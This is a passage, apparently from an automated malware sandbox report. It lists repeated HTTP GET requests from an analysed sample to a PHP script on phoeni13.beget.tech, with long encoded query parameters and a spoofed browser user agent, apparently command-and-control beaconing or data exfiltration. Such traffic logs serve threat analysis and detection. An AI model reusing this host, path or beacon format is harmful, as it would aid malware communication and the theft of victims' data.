yIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJhXVq90dJp2T4lkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT5VkaadXSDxUaVNUTp9maJtmWE9UbCpWWyUkaZhmRX1EbGR1TxkkMZxmVq1EboRUT3VkaOFzY6lFbCRVWwU0VPlmStplMJNETpV1QNdXRqlkNJNUTxEFVNJTWE5kMFR1TrJleNdXStpleZpmWwcGVORTUX9kaGpmWwEEVZhmWt5EbWpmT0UleNl2dpl0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0cJNUTp9maJlmUq5kakRVWpZ1VatmQEpFbadVW410RPBTWqplMnRVWpZUbNlXUX9UeJpWWxMGVZRTRUpVaKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJVlUsZVUaxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5c